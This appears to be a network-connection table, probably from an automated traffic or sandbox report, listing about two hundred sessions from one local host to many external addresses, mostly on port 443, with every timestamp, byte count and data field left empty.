                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17907192.168.2.1436252126.56.196.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17908192.168.2.143586885.96.161.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17909192.168.2.1456996106.71.138.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17910192.168.2.1458982174.150.13.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17911192.168.2.144692875.69.106.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17912192.168.2.145277271.135.117.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17913192.168.2.1449682147.83.12.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17914192.168.2.1456642111.79.157.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17915192.168.2.1436668126.212.247.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17916192.168.2.1448844220.30.173.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17917192.168.2.1439134149.206.183.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17918192.168.2.1458478131.129.208.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17919192.168.2.1449848163.236.26.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17920192.168.2.1434774175.176.211.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17921192.168.2.14556424.237.155.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17922192.168.2.1447756114.112.219.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17923192.168.2.145074048.121.253.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17924192.168.2.1436238181.74.117.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17925192.168.2.1452790116.82.120.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17926192.168.2.145512893.93.198.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17927192.168.2.1458088221.111.109.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17928192.168.2.1433448129.150.159.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17929192.168.2.1448384209.204.145.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17930192.168.2.145746658.6.25.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17931192.168.2.1433748149.97.241.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17932192.168.2.143901036.19.15.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17933192.168.2.145274449.43.66.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17934192.168.2.144390638.124.147.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17935192.168.2.144171064.119.234.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17936192.168.2.144248439.236.180.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17937192.168.2.1460008200.193.79.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17938192.168.2.143922467.11.35.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17939192.168.2.1446272209.196.255.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17940192.168.2.1442454132.81.223.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17941192.168.2.1435670205.24.141.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17942192.168.2.1444100177.207.45.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17943192.168.2.1447578130.28.0.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17944192.168.2.144138034.85.227.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17945192.168.2.1436402168.126.125.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17946192.168.2.1445344193.44.208.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17947192.168.2.1434448156.143.117.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17948192.168.2.145473885.71.214.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17949192.168.2.1459342195.113.46.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17950192.168.2.1440422200.241.62.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17951192.168.2.1434442103.85.205.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17952192.168.2.1433306150.255.190.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17953192.168.2.1434828158.236.238.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17954192.168.2.1444046155.158.53.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17955192.168.2.1445310176.208.118.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17956192.168.2.1442910182.53.185.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17957192.168.2.1449464126.191.183.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17958192.168.2.1452712198.94.30.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17959192.168.2.1447864187.85.196.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17960192.168.2.1447550132.12.106.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17961192.168.2.1437392105.91.186.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17962192.168.2.144861071.23.221.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17963192.168.2.143604236.106.23.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17964192.168.2.1456250106.18.72.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17965192.168.2.1438712218.150.131.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17966192.168.2.1453404143.218.154.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17967192.168.2.1460996209.202.83.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17968192.168.2.1453052122.178.95.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17969192.168.2.143817448.23.153.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17970192.168.2.1445836189.170.154.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17971192.168.2.144151276.98.91.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17972192.168.2.143365881.9.194.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17973192.168.2.1433180128.102.20.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17974192.168.2.1453670197.145.67.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17975192.168.2.1435026200.14.43.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17976192.168.2.1447636115.26.42.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17977192.168.2.143562681.172.218.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17978192.168.2.1450600153.8.106.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17979192.168.2.1452684154.204.155.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17980192.168.2.1442884142.46.86.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17981192.168.2.1440642190.98.190.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17982192.168.2.1433092114.104.96.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17983192.168.2.143921261.49.48.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17984192.168.2.1435598117.40.91.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17985192.168.2.1453322159.229.119.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17986192.168.2.145365819.127.140.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17987192.168.2.1436654106.110.227.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17988192.168.2.1452856146.110.176.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17989192.168.2.1434332159.49.203.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17990192.168.2.1451028126.15.43.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17991192.168.2.1460832182.185.150.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17992192.168.2.143791660.153.68.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17993192.168.2.1459514202.78.153.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17994192.168.2.1458356114.65.172.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17995192.168.2.1446734159.139.16.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17996192.168.2.1441676158.208.163.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17997192.168.2.145209623.209.103.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17998192.168.2.1458224193.215.86.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17999192.168.2.1446364132.178.189.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18000192.168.2.144234420.185.40.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18001192.168.2.144201654.47.192.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18002192.168.2.143558090.21.61.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18003192.168.2.1455660154.151.8.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18004192.168.2.1455520163.91.149.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18005192.168.2.1448554163.90.104.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18006192.168.2.143842645.224.164.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18007192.168.2.1446368168.32.12.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18008192.168.2.143798482.255.214.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18009192.168.2.1441954197.230.27.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18010192.168.2.1438208213.231.150.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18011192.168.2.1458140209.7.138.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18012192.168.2.143407650.51.220.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18013192.168.2.1441964141.160.146.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18014192.168.2.145299013.188.125.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18015192.168.2.1434076213.108.231.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18016192.168.2.144138499.65.206.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18017192.168.2.1455064180.254.131.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18018192.168.2.1456270197.160.91.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18019192.168.2.1457422147.7.24.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18020192.168.2.1460970144.36.36.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18021192.168.2.1432928134.234.103.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18022192.168.2.1445148126.10.197.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18023192.168.2.1436810100.52.219.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18024192.168.2.1451240216.206.197.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18025192.168.2.1453338170.184.181.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18026192.168.2.145575291.163.178.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18027192.168.2.1449910179.233.217.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18028192.168.2.1453468165.219.196.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18029192.168.2.1460500195.128.197.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18030192.168.2.143448861.168.67.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18031192.168.2.1451908151.142.222.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18032192.168.2.143901099.180.99.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18033192.168.2.1437330125.145.209.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18034192.168.2.143295624.108.128.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18035192.168.2.1450440129.92.139.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18036192.168.2.1446922134.217.49.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18037192.168.2.1451900111.223.7.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18038192.168.2.145662684.159.35.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18039192.168.2.143497650.43.109.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18040192.168.2.1458432177.121.121.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18041192.168.2.145745699.208.126.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18042192.168.2.1438282206.248.108.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18043192.168.2.145999019.192.253.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18044192.168.2.1456548114.40.29.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18045192.168.2.145458025.226.137.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18046192.168.2.1441360145.66.254.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18047192.168.2.1442668172.87.77.2138080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18048192.168.2.145772860.65.87.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18049192.168.2.144524027.143.86.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18050192.168.2.1453310186.146.231.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18051192.168.2.14581342.222.55.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18052192.168.2.143704424.116.152.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18053192.168.2.143443639.52.72.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18054192.168.2.144269898.23.162.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18055192.168.2.144198038.184.42.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18056192.168.2.1453234139.141.148.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18057192.168.2.143389418.145.115.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18058192.168.2.144535845.18.145.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18059192.168.2.145592675.53.214.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18060192.168.2.1445928129.136.224.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18061192.168.2.1454350170.25.52.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18062192.168.2.1441360166.206.87.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18063192.168.2.145557412.31.182.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18064192.168.2.143472085.187.157.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18065192.168.2.1446786153.146.126.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18066192.168.2.145855046.189.80.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18067192.168.2.1447634115.140.68.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18068192.168.2.144123671.178.149.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18069192.168.2.1450454112.46.235.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18070192.168.2.1439792194.3.106.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18071192.168.2.1452732138.156.89.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18072192.168.2.1459036145.103.25.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18073192.168.2.144563845.166.180.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18074192.168.2.1441734193.129.141.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18075192.168.2.1433466159.211.97.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18076192.168.2.1438054153.214.40.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18077192.168.2.14547482.172.125.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18078192.168.2.1439994203.238.158.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18079192.168.2.1457024156.177.180.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18080192.168.2.1449064163.113.155.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18081192.168.2.1436174110.204.151.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18082192.168.2.143858061.211.131.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18083192.168.2.1458096200.136.2.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18084192.168.2.144871873.48.225.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18085192.168.2.1433706139.104.88.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18086192.168.2.1459654110.13.94.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18087192.168.2.1447510150.170.108.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18088192.168.2.1456576123.23.7.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18089192.168.2.143351812.244.30.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18090192.168.2.1456998144.254.10.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18091192.168.2.145228831.140.246.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18092192.168.2.1450406205.34.216.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18093192.168.2.1445008138.139.155.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18094192.168.2.1459002191.145.246.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18095192.168.2.1451942218.110.56.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18096192.168.2.1457240213.191.96.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18097192.168.2.145688840.212.219.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18098192.168.2.1448824211.54.105.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18099192.168.2.144204451.216.240.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18100192.168.2.14582741.78.99.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18101192.168.2.144434219.40.51.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18102192.168.2.144885040.183.111.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18103192.168.2.1441732208.240.232.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18104192.168.2.1443388105.16.137.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18105192.168.2.1455344101.141.188.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18106192.168.2.146088252.248.74.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18107192.168.2.1434376117.179.123.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18108192.168.2.1450386159.194.146.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18109192.168.2.1454876181.204.64.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18110192.168.2.143494097.40.123.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18111192.168.2.1435412172.51.97.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18112192.168.2.1459308100.6.14.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18113192.168.2.145205685.151.243.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18114192.168.2.143625691.156.198.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18115192.168.2.146085034.33.33.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18116192.168.2.1454892175.46.103.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18117192.168.2.144431625.7.108.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18118192.168.2.143386482.240.110.53443
                                                      TimestampBytes transferredDirectionData


